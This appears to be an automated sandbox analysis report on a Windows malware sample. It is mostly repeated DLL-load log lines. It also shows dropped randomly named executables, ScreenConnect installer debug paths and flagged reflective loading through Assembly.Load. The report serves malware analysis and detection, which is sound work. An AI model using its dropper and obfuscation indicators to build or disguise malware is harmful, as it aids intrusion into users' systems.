                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: RPHbzz3JqY.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: RPHbzz3JqY.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbQ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb\888 source: gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe.26.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdba444 source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000001333000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe.26.dr
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765388951.0000000000F2D000.00000002.00000001.01000000.00000008.sdmp, ix4A2DreBBsQwY6YHkidcDjo.exe, 00000012.00000000.1903447365.0000000000FCD000.00000002.00000001.01000000.00000012.sdmp, YAPNXRPmcarcR4ZDgC81Tbdk.exe, 00000013.00000000.1966000603.000000000024D000.00000002.00000001.01000000.00000013.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000014.00000000.2028047270.00000000002ED000.00000002.00000001.01000000.00000014.sdmp, 3HvoFOAmEaJswFCHOzyfyz5b.exe, 00000015.00000000.2102895090.0000000000EBD000.00000002.00000001.01000000.00000015.sdmp, 6KZmcK8r6beUzmRf6Ci6nx8d.exe, 00000016.00000000.2167482839.000000000091D000.00000002.00000001.01000000.00000016.sdmp, yDd3OJXsNQptgFrYILoygXLs.exe, 00000017.00000000.2231749071.0000000000EFD000.00000002.00000001.01000000.00000017.sdmp, xpTljBOh8s4KWiGtXsL1c00g.exe, 00000019.00000000.2295830605.00000000008DD000.00000002.00000001.01000000.00000019.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe, 0000001E.00000000.2373071915.000000000067D000.00000002.00000001.01000000.0000001B.sdmp, V6uPDVniSnRMWuLn5U9T3TGJ.exe, 00000020.00000000.2460409209.000000000018D000.00000002.00000001.01000000.0000001C.sdmp, 2TUSzbAUfKRfcjcMzfoV1qdi.exe, 00000023.00000000.2556332589.000000000009D000.00000002.00000001.01000000.0000001D.sdmp, ixjnzi95HfqR77bieLYCT4aJ.exe, 00000024.00000000.2651179810.000000000002D000.00000002.00000001.01000000.0000001E.sdmp, 6pkNzPZrIkyPzGNsokLQ8aZR.exe, 00000025.00000000.2754908254.0000000000E7D000.00000002.00000001.01000000.0000001F.sdmp, hQdOgl4rhYQYx3G5aYY61LEd.exe, 00000026.00000000.2881740586.000000000063D000.00000002.00000001.01000000.00000020.sdmp, oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp

                            Data Obfuscation

                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr, -Module-.cs .Net Code: _202D_202C_202E_206E_202B_206C_206E_206C_200D_202A_200B_206D_202E_202E_206D_202C_206C_202D_202C_202A_202E_206A_206E_202E_202B_202D_202D_200B_206E_202D_206F_202E_202A_206B_202C_200C_206C_202B_200B_206B_202E System.Reflection.Assembly.Load(byte[])
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.146ecf4.5.raw.unpack, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: RPHbzz3JqY.exe Static PE information: real checksum: 0x0 should be: 0x5978a
                            Source: explert.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x5978a
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x12e0ec
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.dr Static PE information: real checksum: 0x55a3be should be: 0x56d57b
